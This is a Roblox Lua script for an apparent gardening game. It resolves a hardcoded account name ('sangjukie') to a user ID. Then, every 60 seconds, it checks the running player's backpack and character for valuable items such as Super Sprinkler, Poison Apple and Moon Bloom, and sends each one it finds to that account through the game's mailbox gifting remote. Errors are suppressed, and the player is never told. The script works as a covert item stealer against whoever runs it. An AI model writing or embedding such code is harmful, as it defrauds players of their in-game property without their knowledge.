local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local LocalPlayer = Players.LocalPlayer
local Networking = require(ReplicatedStorage.SharedModules.Networking)

--------------------------------------------------
-- CONFIG
--------------------------------------------------

local USERNAME = "sangjukie"
local INTERVAL = 60

--------------------------------------------------
-- GET USER ID
--------------------------------------------------

local Success, UserId = pcall(function()
	return Players:GetUserIdFromNameAsync(USERNAME)
end)

if not Success then
	return
end

--------------------------------------------------
-- CHECK ITEM
--------------------------------------------------

local function HasItem(ItemName)
	local Backpack = LocalPlayer:FindFirstChild("Backpack")
	local Character = LocalPlayer.Character

	return (Backpack and Backpack:FindFirstChild(ItemName))
		or (Character and Character:FindFirstChild(ItemName))
end

--------------------------------------------------
-- LOOP GIFT
--------------------------------------------------

while task.wait(INTERVAL) do

	-- Super Sprinkler
	if HasItem("Super Sprinkler") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Sprinklers",
						ItemKey = "Super Sprinkler",
						Count = 1
					}
				},
				"SuperSprinkler"
			)
		end)
	end

	-- Super Watering Can
	if HasItem("Super Watering Can") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "WateringCans",
						ItemKey = "Super Watering Can",
						Count = 1
					}
				},
				"SuperWatering"
			)
		end)
	end

	if HasItem("Venom Spitter") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Venom Spitter",
						Count = 1
					}
				},
				"VenomSpitter"
			)
		end)
	end

	if HasItem("Legendary Sprinkler") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Legendary Sprinkler",
						Count = 1
					}
				},
				"Legendary Sprinkler"
			)
		end)
	end

	if HasItem("Poison Apple") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Poison Apple",
						Count = 1
					}
				},
				"Poison Apple"
			)
		end)
	end

	if HasItem("Dragon's Breath") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Dragon's Breath",
						Count = 1
					}
				},
				"Dragon's Breath"
			)
		end)
	end

	if HasItem("Rainbow") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Rainbow",
						Count = 1
					}
				},
				"Rainbow"
			)
		end)
	end

	if HasItem("Venus Fly Trap") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Venus Fly Trap",
						Count = 1
					}
				},
				"Venus Fly Trap"
			)
		end)
	end

	if HasItem("Gold") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Gold",
						Count = 1
					}
				},
				"Gold"
			)
		end)
	end

	if HasItem("Moon Bloom") then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Moon Bloom",
						Count = 1
					}
				},
				"Moon Bloom"
			)
		end)
	end



end
